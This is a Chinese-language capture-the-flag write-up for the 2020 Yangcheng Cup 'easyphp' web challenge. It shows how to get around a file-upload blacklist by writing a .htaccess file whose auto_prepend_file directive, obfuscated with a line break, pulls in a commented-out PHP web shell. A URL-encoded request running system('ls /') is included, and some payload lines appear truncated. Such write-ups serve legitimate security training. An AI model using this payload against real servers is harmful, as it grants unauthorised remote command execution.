[羊城杯 2020] easyphp

打开题目,源代码

  

简单分析一下,先scandir函数来获取指定目录 ./下的所有文件和文件夹的列表,然后如果不为index.php,则unlink函数删除文件。接着就是对上传文件写入内容的黑名单过滤,然后对文件名正则匹配无字母。最后file_put_contents读取文件

既然文件名无字母,我们可以用.htaccess配置文件攻击
思路:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n。

payload

php_value auto_prepend_fil\e .htaccess 
#\ 

注:以注释的方法来写shell
由于这里有换行,我们丢到cyberchef里url编码
成功上传

?filename=.htaccess&content=php_value%20auto_prepend_fil%5Ce%20.htaccess%20%0A#%3C?php%20system('ls%20/');?%3E%5C%20

[羊城杯 2020] easyphp_第1张图片修改命令,要绕过一下

php_value auto_prepend_fil\e .htaccess 
#\ 

编码一下上传,得到flag
[羊城杯 2020] easyphp_第2张图片

你可能感兴趣的:(文件上传,php,web安全)